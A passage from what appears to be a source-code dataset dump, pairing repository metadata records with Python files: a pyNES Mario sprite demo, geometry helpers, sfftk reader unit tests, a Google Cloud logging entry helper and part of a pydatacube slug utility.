    return extensions.hasGLExtension( EXTENSION_NAME )
| 39.888889 | 71 | 0.81987 | 161 | 1,077 | 5.024845 | 0.310559 | 0.177998 | 0.118665 | 0.12979 | 0.551298 | 0.346106 | 0.346106 | 0 | 0 | 0 | 0 | 0.049231 | 0.094708 | 1,077 | 26 | 72 | 41.423077 | 0.780513 | 0.108635 | 0 | 0 | 1 | 0 | 0.273973 | 0.187566 | 0 | 0 | 0.05058 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.136364 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6fee963092d66a5995b3a43e9089c5f670f7fd2 | 898 | py | Python | pynes/examples/mario.py | timgates42/pyNES | e385c7189eca44b9a9e0e781b28c8562e0647b0b | [
"BSD-3-Clause"
] | 1,046 | 2015-02-10T02:23:58.000Z | 2022-03-16T02:42:02.000Z | pynes/examples/mario.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 30 | 2015-02-11T15:21:10.000Z | 2022-03-11T23:12:26.000Z | pynes/examples/mario.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 132 | 2015-05-28T14:55:04.000Z | 2021-12-09T18:58:45.000Z | import pynes
from pynes.bitbag import *
if __name__ == "__main__":
    pynes.press_start()
    exit()
palette = [
0x22,0x29, 0x1A,0x0F, 0x22,0x36,0x17,0x0F, 0x22,0x30,0x21,0x0F, 0x22,0x27,0x17,0x0F,
0x22,0x16,0x27,0x18, 0x22,0x1A,0x30,0x27, 0x22,0x16,0x30,0x27, 0x22,0x0F,0x36,0x17]
chr_asset = import_chr('mario.chr')
tinymario = define_sprite(108,144, [50,51,52,53], 0)
mario = define_sprite(128, 128, [0, 1, 2, 3, 4, 5, 6, 7], 0)
firemario = define_sprite(164,128, [0, 1, 2, 3, 4, 5, 6, 7], 0)
def reset():
    wait_vblank()
    clearmem()
    wait_vblank()
    load_palette(palette)
    load_sprite(tinymario, 0)
    load_sprite(mario, 4)
    load_sprite(firemario, 12)

def joypad1_up():
    get_sprite(mario).y -= 1

def joypad1_down():
    get_sprite(mario).y += 1

def joypad1_left():
    get_sprite(mario).x -= 1

def joypad1_right():
    get_sprite(mario).x += 1
| 20.883721 | 90 | 0.64922 | 144 | 898 | 3.854167 | 0.416667 | 0.099099 | 0.100901 | 0.021622 | 0.194595 | 0.136937 | 0.136937 | 0.043243 | 0.043243 | 0.043243 | 0 | 0.200549 | 0.18931 | 898 | 42 | 91 | 21.380952 | 0.561813 | 0 | 0 | 0.071429 | 0 | 0 | 0.018952 | 0 | 0 | 0 | 0.142698 | 0 | 0 | 1 | 0.178571 | false | 0 | 0.107143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e057c3146b2a35d72243c16effee9d368779138 | 1,173 | py | Python | utils/paramutils.py | louity/generating-doodle | dfed08a5d278122e3303e84a22df5da2686255fe | [
"MIT"
] | null | null | null | utils/paramutils.py | louity/generating-doodle | dfed08a5d278122e3303e84a22df5da2686255fe | [
"MIT"
] | null | null | null | utils/paramutils.py | louity/generating-doodle | dfed08a5d278122e3303e84a22df5da2686255fe | [
"MIT"
] | null | null | null | import numpy as np
def point_to_seg(x1, x2) -> np.ndarray:
    '''
    Method:
    -------
    Transform 2 points into a parametrized segment. Implicitly phi is in
    [-pi/2; pi/2]; it is the oriented angle the segment makes with the
    horizontal line passing through its middle c.
    '''
    c = (x1[:2] + x2[:2]) / 2
    # TODO: funny, could define different topologies to explore.
    if np.sum((x2 - x1)**2) == 0:
        print('x2 is equal to x1?')
    r = np.sqrt(np.sum((x2 - x1)**2))
    # TODO: check that the angle is well oriented
    sign = np.sign(x2[0] - x1[0]) * np.sign(x2[1] - x1[1])
    phi = sign * np.arccos(np.abs(x2[0] - x1[0]) / r)
    if phi < -np.pi/2 or phi > np.pi/2:
        raise ValueError('the value of phi is not in [-pi/2, pi/2] but is {}'.format(phi))
    res = np.hstack([c, r, phi])
    return res

def seg_to_point(seg) -> (np.ndarray, np.ndarray):
    '''transforms seg (c, r, phi) into a tuple of two 2-d points'''
    phi = seg[3]
    r = seg[2]
    c = seg[:2]
    dx = np.abs(np.cos(phi) * r / 2)
    dy = np.abs(np.sin(phi) * r / 2)
    x1 = c - np.array([dx, np.sign(phi) * dy])
    x2 = c + np.array([dx, np.sign(phi) * dy])
    return (x1, x2)
| 32.583333 | 90 | 0.572038 | 215 | 1,173 | 3.102326 | 0.367442 | 0.026987 | 0.014993 | 0.02099 | 0.116942 | 0.062969 | 0.062969 | 0.062969 | 0 | 0 | 0 | 0.050905 | 0.246377 | 1,173 | 35 | 91 | 33.514286 | 0.70362 | 0.304348 | 0 | 0 | 0 | 0 | 0.087404 | 0 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.190476 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
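The two conversions are meant to round-trip: a pair of points maps to `(c, r, phi)` and back. A stdlib-only sketch of the same parametrization (`math` in place of NumPy, tuples in place of arrays; degenerate vertical or horizontal segments are not guaranteed to behave identically to the NumPy version):

```python
import math

def point_to_seg(x1, x2):
    # Midpoint c, length r, and oriented angle phi in [-pi/2, pi/2].
    cx, cy = (x1[0] + x2[0]) / 2, (x1[1] + x2[1]) / 2
    r = math.hypot(x2[0] - x1[0], x2[1] - x1[1])
    sign = math.copysign(1.0, (x2[0] - x1[0]) * (x2[1] - x1[1]))
    phi = sign * math.acos(abs(x2[0] - x1[0]) / r)
    return (cx, cy, r, phi)

def seg_to_point(seg):
    cx, cy, r, phi = seg
    dx = abs(math.cos(phi)) * r / 2
    dy = abs(math.sin(phi)) * r / 2
    sy = math.copysign(1.0, phi)
    return ((cx - dx, cy - sy * dy), (cx + dx, cy + sy * dy))

# Round-trips (0, 0) and (4, 3) up to floating-point error.
p1, p2 = seg_to_point(point_to_seg((0.0, 0.0), (4.0, 3.0)))
```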
8e07779be64b5247716c3c8bb7b9dc225c5ec93a | 17,595 | py | Python | sfftk/unittests/test_readers.py | ssabrii/sfftk | 5cab37f1c9ecb9c2507672fd3232b1b9b5405511 | [
"Apache-2.0"
] | null | null | null | sfftk/unittests/test_readers.py | ssabrii/sfftk | 5cab37f1c9ecb9c2507672fd3232b1b9b5405511 | [
"Apache-2.0"
] | null | null | null | sfftk/unittests/test_readers.py | ssabrii/sfftk | 5cab37f1c9ecb9c2507672fd3232b1b9b5405511 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
sfftk.unittests.test_readers
This testing module should have no side-effects because it only reads.
"""
from __future__ import division, print_function
import glob
import os
import struct
import sys
import unittest
import numpy
import random_words
import __init__ as tests
import ahds
from ..readers import amreader, mapreader, modreader, segreader, stlreader, surfreader
__author__ = "Paul K. Korir, PhD"
__email__ = "pkorir@ebi.ac.uk, paul.korir@gmail.com"
__date__ = "2017-05-15"
__updated__ = '2018-02-14'
rw = random_words.RandomWords()
# readers
class TestReaders_amreader(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        cls.am_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.am')
        cls.header, cls.segments_by_stream = amreader.get_data(cls.am_file)

    def test_get_data(self):
        """Test the main entry point: get_data(...)"""
        self.assertIsInstance(self.header, ahds.header.AmiraHeader)
        self.assertIsInstance(self.segments_by_stream, numpy.ndarray)
        self.assertGreaterEqual(len(self.segments_by_stream), 1)

    def test_first_line_amiramesh(self):
        """test that it's declared as an AmiraMesh file"""
        self.assertEqual(self.header.designation.filetype, 'AmiraMesh')

    def test_first_line_binary_little_endian(self):
        """test that it is formatted as BINARY-LITTLE-ENDIAN"""
        self.assertEqual(self.header.designation.format, 'BINARY-LITTLE-ENDIAN')

    def test_first_line_version(self):
        """test that it is version 2.1"""
        self.assertEqual(self.header.designation.version, '2.1')

    def test_lattice_present(self):
        """test Lattice definition exists in definitions"""
        self.assertTrue('Lattice' in self.header.definitions.attrs)

    def test_materials_present(self):
        """test Materials exist in parameters"""
        self.assertIsNotNone('Materials' in self.header.parameters.attrs)

    def test_read_hxsurface(self):
        """Test handling of AmiraMesh hxsurface files"""
        am_hxsurface_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_hxsurface.am')
        header, segments_by_stream = amreader.get_data(am_hxsurface_file)
        self.assertIsInstance(header, ahds.header.AmiraHeader)
        self.assertIsNone(segments_by_stream)
class TestReaders_mapreader(unittest.TestCase):
    def setUp(self):
        self.map_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.map')

    def test_get_data(self):
        """Test the main entry point: get_data(...)"""
        map_ = mapreader.get_data(self.map_file)
        self.assertIsInstance(map_, mapreader.Map)
        self.assertGreater(map_._nc, 0)
        self.assertGreater(map_._nr, 0)
        self.assertGreater(map_._ns, 0)
        self.assertIn(map_._mode, range(5))
        self.assertIsInstance(map_._ncstart, int)
        self.assertIsInstance(map_._nrstart, int)
        self.assertIsInstance(map_._nsstart, int)
        self.assertGreater(map_._nx, 0)
        self.assertGreater(map_._ny, 0)
        self.assertGreater(map_._nz, 0)
        self.assertGreater(map_._x_length, 0)
        self.assertGreater(map_._y_length, 0)
        self.assertGreater(map_._z_length, 0)
        self.assertTrue(0 < map_._alpha < 180)
        self.assertTrue(0 < map_._beta < 180)
        self.assertTrue(0 < map_._gamma < 180)
        self.assertIn(map_._mapc, range(1, 4))
        self.assertIn(map_._mapr, range(1, 4))
        self.assertIn(map_._maps, range(1, 4))
        self.assertIsInstance(map_._amin, float)
        self.assertIsInstance(map_._amax, float)
        self.assertIsInstance(map_._amean, float)
        self.assertIn(map_._ispg, range(1, 231))
        self.assertTrue(map_._nsymbt % 80 == 0)
        self.assertIn(map_._lskflg, range(2))
        self.assertIsInstance(map_._s11, float)
        self.assertIsInstance(map_._s12, float)
        self.assertIsInstance(map_._s13, float)
        self.assertIsInstance(map_._s21, float)
        self.assertIsInstance(map_._s22, float)
        self.assertIsInstance(map_._s23, float)
        self.assertIsInstance(map_._s31, float)
        self.assertIsInstance(map_._s32, float)
        self.assertIsInstance(map_._s33, float)
        self.assertIsInstance(map_._t1, float)
        self.assertIsInstance(map_._t2, float)
        self.assertIsInstance(map_._t3, float)
        self.assertEqual(map_._map, 'MAP ')
        self.assertIsInstance(map_._machst, tuple)
        self.assertGreater(map_._rms, 0)
        self.assertGreater(map_._nlabl, 0)

    def test_write(self):
        """Test write map file"""
        map_to_write = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_write_map.map')
        written_maps = glob.glob(map_to_write)
        self.assertEqual(len(written_maps), 0)
        with open(map_to_write, 'w') as f:
            map_ = mapreader.get_data(self.map_file)
            map_.write(f)
        written_maps = glob.glob(map_to_write)
        self.assertEqual(len(written_maps), 1)
        map(os.remove, written_maps)

    def test_invert(self):
        """Test invert map intensities"""
        map_ = mapreader.get_data(self.map_file, inverted=False)
        self.assertFalse(map_._inverted)
        map_.invert()
        self.assertTrue(map_._inverted)
        map_ = mapreader.get_data(self.map_file, inverted=True)
        self.assertTrue(map_._inverted)
        # check the inversion is complete and that we add a new label
        with open('rm.map', 'w') as f:
            map_.write(f)
        map__ = mapreader.get_data('rm.map')
        self.assertEqual(map__._nlabl, 2)
        os.remove('rm.map')

    def test_fix_mask(self):
        """Test fix mask for fixable mask"""
        fixable_mask = mapreader.Map(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_fixable_mask.map'))
        self.assertFalse(fixable_mask.is_mask)
        fixable_mask.fix_mask()
        self.assertTrue(fixable_mask.is_mask)

    def test_unfixable_mask(self):
        """Test exception for unfixable mask"""
        unfixable_mask = mapreader.Map(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_unfixable_mask.map'))
        self.assertFalse(unfixable_mask.is_mask)
        with self.assertRaises(ValueError):
            unfixable_mask.fix_mask()
        self.assertFalse(unfixable_mask.is_mask)

    def test_bad_data_fail(self):
        """Test that a corrupted file (extra data at end) raises Exception"""
        with self.assertRaises(ValueError):
            mapreader.Map(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data1.map'))

    def test_bad_data_fail2(self):
        """Test that we can raise an exception with a malformed header"""
        with self.assertRaises(ValueError):
            mapreader.get_data(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_corrupt_header.map'))

    def test_bad_data_fail3(self):
        """Test that we can't have too long a header"""
        with self.assertRaises(ValueError):
            # create a map file with a header larger than 1024 to see the exception
            map = mapreader.get_data(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.map'))
            for i in range(map._nlabl):
                label = getattr(map, '_label_{}'.format(i))
            y = 11
            for j in range(1, y):
                setattr(map, '_label_{}'.format(j), label)
            map._nlabl = y
            with open('rm.map', 'w') as f:
                map.write(f)
class TestReaders_modreader(unittest.TestCase):
    @classmethod
    def setUp(cls):
        cls.mod_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.mod')
        cls.mod = modreader.get_data(cls.mod_file)

    def test_get_data(self):
        """Test the main entry point: get_data(...)"""
        self.assertTrue(self.mod.isset)
        self.assertGreater(len(self.mod.objts), 0)
        self.assertGreater(self.mod.objt_count, 0)
        self.assertEqual(self.mod.version, 'V1.2')
        self.assertEqual(self.mod.name, 'IMOD-NewModel')
        self.assertGreater(self.mod.xmax, 0)
        self.assertGreater(self.mod.ymax, 0)
        self.assertGreater(self.mod.zmax, 0)
        self.assertGreaterEqual(self.mod.objsize, 1)
        self.assertIn(self.mod.drawmode, [-1, 1])
        self.assertIn(self.mod.mousemode, range(3))  # unclear what 2 is equal to INVALID VALUE
        self.assertIn(self.mod.blacklevel, range(256))
        self.assertIn(self.mod.whitelevel, range(256))
        self.assertEqual(self.mod.xoffset, 0)
        self.assertEqual(self.mod.yoffset, 0)
        self.assertEqual(self.mod.zoffset, 0)
        self.assertGreater(self.mod.xscale, 0)
        self.assertGreater(self.mod.yscale, 0)
        self.assertGreater(self.mod.zscale, 0)
        self.assertGreaterEqual(self.mod.object, 0)
        self.assertGreaterEqual(self.mod.contour, -1)
        self.assertGreaterEqual(self.mod.point, -1)
        self.assertGreaterEqual(self.mod.res, 0)
        self.assertIn(self.mod.thresh, range(256))
        self.assertGreater(self.mod.pixsize, 0)
        self.assertIn(self.mod.units, ['pm', 'Angstroms', 'nm', 'microns', 'mm', 'cm', 'm', 'pixels', 'km'])
        self.assertIsInstance(self.mod.csum, int)
        self.assertEqual(self.mod.alpha, 0)
        self.assertEqual(self.mod.beta, 0)
        self.assertEqual(self.mod.gamma, 0)

    def test_read_fail1(self):
        """Test that file missing 'IMOD' at beginning fails"""
        mod_fn = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data1.mod')
        with self.assertRaises(ValueError):
            modreader.get_data(mod_fn)  # missing 'IMOD' start

    def test_read_fail2(self):
        """Test that file missing 'IEOF' at end fails"""
        mod_fn = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data2.mod')
        with self.assertRaises(ValueError):
            modreader.get_data(mod_fn)  # missing 'IEOF' end

    def test_IMOD_pass(self):
        """Test that IMOD chunk read"""
        self.assertTrue(self.mod.isset)

    def test_OBJT_pass(self):
        """Test that OBJT chunk read"""
        for O in self.mod.objts.itervalues():
            self.assertTrue(O.isset)

    def test_CONT_pass(self):
        """Test that CONT chunk read"""
        for O in self.mod.objts.itervalues():
            for C in O.conts.itervalues():
                self.assertTrue(C.isset)

    def test_MESH_pass(self):
        """Test that MESH chunk read"""
        for O in self.mod.objts.itervalues():
            for M in O.meshes.itervalues():
                self.assertTrue(M.isset)

    def test_IMAT_pass(self):
        """Test that IMAT chunk read"""
        for O in self.mod.objts.itervalues():
            self.assertTrue(O.imat.isset)

    def test_VIEW_pass(self):
        """Test that VIEW chunk read"""
        for V in self.mod.views.itervalues():
            self.assertTrue(V.isset)

    def test_MINX_pass(self):
        """Test that MINX chunk read"""
        self.assertTrue(self.mod.minx.isset)

    def test_MEPA_pass(self):
        """Test that MEPA chunk read"""
        for O in self.mod.objts.itervalues():
            try:
                self.assertTrue(O.mepa.isset)
            except AttributeError:
                self.assertEqual(O.mepa, None)

    def test_CLIP_pass(self):
        """Test that CLIP chunk read"""
        for O in self.mod.objts.itervalues():
            try:
                self.assertTrue(O.clip.isset)
            except AttributeError:
                self.assertEqual(O.clip, None)

    def test_number_of_OBJT_chunks(self):
        """Test that compares declared and found OBJT chunks"""
        self.assertEqual(self.mod.objsize, len(self.mod.objts))

    def test_number_of_CONT_chunks(self):
        """Test that compares declared and found CONT chunks"""
        for O in self.mod.objts.itervalues():
            self.assertEqual(O.contsize, len(O.conts))

    def test_number_of_MESH_chunks(self):
        """Test that compares declared and found MESH chunks"""
        for O in self.mod.objts.itervalues():
            self.assertEqual(O.meshsize, len(O.meshes))

    def test_number_of_surface_objects(self):
        """Test that compares declared and found surface objects"""
        for O in self.mod.objts.itervalues():
            no_of_surfaces = 0
            for C in O.conts.itervalues():
                if C.surf != 0:
                    no_of_surfaces += 1
            self.assertEqual(O.surfsize, no_of_surfaces)

    def test_number_of_points_in_CONT_chunk(self):
        """Test that compares declared and found points in CONT chunks"""
        for O in self.mod.objts.itervalues():
            for C in O.conts.itervalues():
                self.assertEqual(C.psize, len(C.pt))

    def test_number_of_vertex_elements_in_MESH_chunk(self):
        """Test that compares declared and found vertices in MESH chunks"""
        for O in self.mod.objts.itervalues():
            for M in O.meshes.itervalues():
                self.assertEqual(M.vsize, len(M.vert))

    def test_number_of_list_elements_in_MESH_chunk(self):
        """Test that compares declared and found indices in MESH chunks"""
        for O in self.mod.objts.itervalues():
            for M in O.meshes.itervalues():
                self.assertEqual(M.lsize, len(M.list))
class TestReaders_segreader(unittest.TestCase):
    def setUp(self):
        self.seg_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.seg')

    def test_get_data(self):
        """Test the main entry point: get_data(...)"""
        seg = segreader.get_data(self.seg_file)
        print(seg, file=sys.stderr)
        self.assertIsInstance(seg, segreader.SeggerSegmentation)
        self.assertEqual(seg.map_level, 0.852)
        self.assertEqual(seg.format_version, 2)
        self.assertItemsEqual(seg.map_size, [26, 27, 30])
        self.assertEqual(seg.format, 'segger')
        self.assertEqual(seg.mask.shape, (30, 27, 26))
class TestReaders_stlreader(unittest.TestCase):
    def setUp(self):
        self.stl_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.stl')
        self.stl_bin_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_binary.stl')
        self.stl_multi_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_multiple.stl')

    def test_get_data(self):
        """Test the main entry point: get_data(...)"""
        meshes = stlreader.get_data(self.stl_file)  # only one mesh here
        name, vertices, polygons = meshes[0]
        num_vertices = len(vertices)
        a, b, c = zip(*polygons.values())
        vertex_ids = set(a + b + c)
        self.assertEqual(name, "{}#{}".format(os.path.basename(self.stl_file), 0))
        self.assertGreaterEqual(num_vertices, 1)
        self.assertEqual(min(vertex_ids), min(vertices.keys()))
        self.assertEqual(max(vertex_ids), max(vertices.keys()))
        self.assertEqual(sum(set(vertex_ids)), sum(vertices.keys()))
        self.assertEqual(set(vertex_ids), set(vertices.keys()))

    def test_read_binary(self):
        """Test that we can read a binary STL file"""
        meshes = stlreader.get_data(self.stl_bin_file)
        print(meshes[0][0], file=sys.stderr)
        name, vertices, polygons = meshes[0]
        self.assertEqual(name, "{}#{}".format(os.path.basename(self.stl_bin_file), 0))
        self.assertTrue(len(vertices) > 0)
        self.assertTrue(len(polygons) > 0)
        polygon_ids = list()
        for a, b, c in polygons.itervalues():
            polygon_ids += [a, b, c]
        self.assertItemsEqual(set(vertices.keys()), set(polygon_ids))

    def test_read_multiple(self):
        """Test that we can read a multi-solid STL file

        Only works for ASCII by concatenation"""
        meshes = stlreader.get_data(self.stl_multi_file)
        for name, vertices, polygons in meshes:
            self.assertEqual(name, "{}#{}".format(os.path.basename(self.stl_multi_file), 0))
            self.assertTrue(len(vertices) > 0)
            self.assertTrue(len(polygons) > 0)
            polygon_ids = list()
            for a, b, c in polygons.itervalues():
                polygon_ids += [a, b, c]
            self.assertItemsEqual(set(vertices.keys()), set(polygon_ids))
class TestReaders_surfreader(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        cls.surf_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.surf')
        cls.header, cls.segments = surfreader.get_data(cls.surf_file)  # only one mesh here

    def test_get_data(self):
        """Test the main entry point: get_data(...)"""
        name = self.segments[2].name
        vertices = self.segments[2].vertices
        triangles = self.segments[2].triangles
        num_vertices = len(vertices)
        a, b, c = zip(*triangles)
        vertex_ids = set(a + b + c)
        self.assertIsInstance(self.header, ahds.header.AmiraHeader)
        self.assertIsInstance(self.segments, dict)
        self.assertEqual(name, 'medulla_r')
        self.assertGreaterEqual(num_vertices, 1)
        self.assertGreaterEqual(len(self.segments), 1)
        self.assertEqual(min(vertex_ids), min(vertices.keys()))
        self.assertEqual(max(vertex_ids), max(vertices.keys()))
        self.assertEqual(sum(set(vertex_ids)), sum(vertices.keys()))
        self.assertEqual(set(vertex_ids), set(vertices.keys()))
if __name__ == "__main__":
    unittest.main()
| 41.4 | 118 | 0.649957 | 2,293 | 17,595 | 4.792412 | 0.16703 | 0.029939 | 0.028392 | 0.023205 | 0.515152 | 0.40495 | 0.351078 | 0.324688 | 0.29757 | 0.27937 | 0 | 0.012511 | 0.227735 | 17,595 | 424 | 119 | 41.497642 | 0.796217 | 0.114237 | 0 | 0.280255 | 0 | 0 | 0.050856 | 0.007554 | 0 | 0 | 0 | 0 | 0.461783 | 1 | 0.143312 | false | 0.028662 | 0.035032 | 0 | 0.197452 | 0.009554 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
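The mapreader assertions above (`_nc`, `_nr`, `_ns`, `_mode`) mirror the CCP4/MRC map header layout, whose first fields are little-endian 32-bit words at the start of the file. A minimal `struct` sketch of reading those first four words — an illustration of the format, not sfftk's actual parser:

```python
import struct

# Fake header prefix: NC=26, NR=27, NS=30 voxels, MODE=2 (32-bit float data),
# matching the 26 x 27 x 30 test map asserted above.
header = struct.pack('<4i', 26, 27, 30, 2)

nc, nr, ns, mode = struct.unpack('<4i', header[:16])
print(nc, nr, ns, mode)  # → 26 27 30 2
```

The `<` prefix forces little-endian interpretation regardless of the host byte order, which is why readers check the MACHST stamp before trusting the numeric fields.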
8e17a9538e76246ed04d8a1eda0d6ac18d6b1fa0 | 1,801 | py | Python | logging/google/cloud/logging/_helpers.py | rodrigodias27/google-cloud-python | 7d1161f70744c0dbbe67a3f472ea95667eaafe50 | [
"Apache-2.0"
] | 1 | 2017-05-18T06:58:48.000Z | 2017-05-18T06:58:48.000Z | logging/google/cloud/logging/_helpers.py | rodrigodias27/google-cloud-python | 7d1161f70744c0dbbe67a3f472ea95667eaafe50 | [
"Apache-2.0"
] | null | null | null | logging/google/cloud/logging/_helpers.py | rodrigodias27/google-cloud-python | 7d1161f70744c0dbbe67a3f472ea95667eaafe50 | [
"Apache-2.0"
] | 1 | 2022-03-24T01:37:10.000Z | 2022-03-24T01:37:10.000Z | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common logging helpers."""
from google.cloud.logging.entries import ProtobufEntry
from google.cloud.logging.entries import StructEntry
from google.cloud.logging.entries import TextEntry
def entry_from_resource(resource, client, loggers):
    """Detect correct entry type from resource and instantiate.

    :type resource: dict
    :param resource: One entry resource from API response.

    :type client: :class:`~google.cloud.logging.client.Client`
    :param client: Client that owns the log entry.

    :type loggers: dict
    :param loggers:
        A mapping of logger fullnames -> loggers.  If the logger
        that owns the entry is not in ``loggers``, the entry
        will have a newly-created logger.

    :rtype: :class:`~google.cloud.logging.entries._BaseEntry`
    :returns: The entry instance, constructed via the resource
    """
    if 'textPayload' in resource:
        return TextEntry.from_api_repr(resource, client, loggers)
    elif 'jsonPayload' in resource:
        return StructEntry.from_api_repr(resource, client, loggers)
    elif 'protoPayload' in resource:
        return ProtobufEntry.from_api_repr(resource, client, loggers)
    raise ValueError('Cannot parse log entry resource.')
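The payload-key dispatch above can be exercised in isolation. The sketch below mimics the pattern with stand-in entry classes — the `Fake*` names and `_DISPATCH` table are hypothetical, not part of `google.cloud.logging`:

```python
# Minimal sketch of the payload-type dispatch, using stand-in
# entry classes instead of the real google.cloud.logging ones.
class _FakeEntry(object):
    @classmethod
    def from_api_repr(cls, resource, client, loggers):
        # Real entry classes build an instance from the resource dict;
        # here we just report which class was selected.
        return cls.__name__

class FakeText(_FakeEntry):
    pass

class FakeStruct(_FakeEntry):
    pass

class FakeProto(_FakeEntry):
    pass

# Payload key -> entry class, mirroring the if/elif chain above.
_DISPATCH = {
    'textPayload': FakeText,
    'jsonPayload': FakeStruct,
    'protoPayload': FakeProto,
}

def fake_entry_from_resource(resource, client=None, loggers=None):
    for key, entry_class in _DISPATCH.items():
        if key in resource:
            return entry_class.from_api_repr(resource, client, loggers)
    raise ValueError('Cannot parse log entry resource.')

print(fake_entry_from_resource({'textPayload': 'hi'}))  # FakeText
print(fake_entry_from_resource({'protoPayload': {}}))   # FakeProto
```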
| 36.755102 | 74 | 0.735702 | 244 | 1,801 | 5.393443 | 0.471311 | 0.045593 | 0.068389 | 0.075988 | 0.158815 | 0.158815 | 0.054711 | 0 | 0 | 0 | 0 | 0.005453 | 0.185453 | 1,801 | 48 | 75 | 37.520833 | 0.891616 | 0.624653 | 0 | 0 | 0 | 0 | 0.109272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
8e1e583f80ca97e7424a25ea64300d82b7ad3565 | 2,090 | py | Python | pydatacube/pcaxis/__init__.py | jampekka/pydatacube | 6999db7ae12d60089904081b47fbddd0cbf9e371 | [
"MIT"
] | 1 | 2016-04-03T10:01:04.000Z | 2016-04-03T10:01:04.000Z | pydatacube/pcaxis/__init__.py | jampekka/pydatacube | 6999db7ae12d60089904081b47fbddd0cbf9e371 | [
"MIT"
] | null | null | null | pydatacube/pcaxis/__init__.py | jampekka/pydatacube | 6999db7ae12d60089904081b47fbddd0cbf9e371 | [
"MIT"
] | 2 | 2015-02-25T08:49:01.000Z | 2018-10-19T23:57:47.000Z | # encoding: utf-8
from collections import OrderedDict
import string
from pydatacube.pydatacube import _DataCube
import px_reader
# A bit scandinavian specific
default_translate = dict(zip(
    u"äöä -",
    u"aoa__"
))
class Sluger(object):
    def __init__(self, translate=default_translate):
        self.given_out = {}
        self.translate = translate

    def __call__(self, value):
        slug = value.lower()
        chars = []
        for c in slug:
            c = self.translate.get(c, c)
            if c == '_':
                chars.append(c)
            if c.isalnum():
                chars.append(c)
        slug = ''.join(chars)
        slug = slug.encode('ascii', errors='ignore')
        realslug = slug
        # Append underscores until the slug is unique among those
        # already handed out, then record it so later calls see it.
        while realslug in self.given_out:
            realslug = realslug + '_'
        self.given_out[realslug] = value
        return realslug
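For reference, here is a self-contained Python 3 sketch of the slugging behaviour implemented above. It is an approximation — the original module targets Python 2 (and leaves the slug as bytes after `encode`), and the standalone `slugify` name is introduced here for illustration:

```python
# Python 3 sketch of the Sluger behaviour: translate Scandinavian
# characters and separators, drop everything non-alphanumeric,
# then disambiguate duplicates with trailing underscores.
DEFAULT_TRANSLATE = dict(zip(u"äöä -", u"aoa__"))

def slugify(value, translate=DEFAULT_TRANSLATE, given_out=None):
    chars = []
    for c in value.lower():
        c = translate.get(c, c)
        if c == '_' or c.isalnum():
            chars.append(c)
    # encode/decode round-trip silently drops any remaining non-ASCII
    slug = ''.join(chars).encode('ascii', errors='ignore').decode('ascii')
    if given_out is not None:
        while slug in given_out:
            slug += '_'
        given_out.add(slug)
    return slug

seen = set()
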